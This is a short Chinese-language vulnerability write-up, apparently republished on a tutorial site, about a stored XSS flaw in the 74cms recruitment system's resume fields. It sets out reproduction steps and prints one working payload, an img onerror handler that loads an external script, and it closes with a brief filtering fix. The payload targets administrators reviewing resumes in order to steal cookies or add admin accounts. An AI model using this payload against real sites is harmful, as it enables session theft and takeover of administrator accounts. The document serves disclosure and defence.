74cms人才系统存储型XSS及修复 - 网站安全 - 自学

74CMS对用户输入没有进行有效过滤，导致XSS 漏洞 存在。漏洞触发时，可拿到系统管理员COOKIE信息，修改后台设置，增加管理员等。

 

1、74CMS人才系统对创建简历的各字段没有进行有效过滤，导致存储型XSS漏洞的存在，存在漏洞的字段包括户口所在地、技能特长、工作经历等等。

 

当系统管理员登陆后台，审核用户提交简历时，漏洞便会触发。利用此漏洞可以盗取管理员的cookie信息登陆后台、或者使用恶意脚本修改后台设置，例如：删除用户提交简历，增加新的管理员等等。

 

 

 

2、从官网：http://www.74cms.com/ 下载 最新版源代码，在本地搭建环境进行测试。

 1、注册普通用户，在会员中心模块创建新简历，并在技能技能特长部分输入以下内容：

 

 

2、简历创建完毕， 系统 管理员登陆后台，查看简历进行审核：

 

3、打开简历，漏洞触发：

 

4、使用Firebug查看源代码：

 

5、修改插入的恶意标签为：

 

<img src=x onerror=d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e);>

 

6、管理员审核简历，漏洞触发：

 

 

 

成功加载本地脚本，通过修改脚本代码，我们可以对系统后台进行恶意修改，例如：删除简历，增加管理员等等。

修复方案：

对用户创建简历的各个字段进行有效过滤，禁止特殊字符和特殊属性的输入

查看更多关于74cms人才系统存储型XSS及修复 - 网站安全 - 自学的详细内容...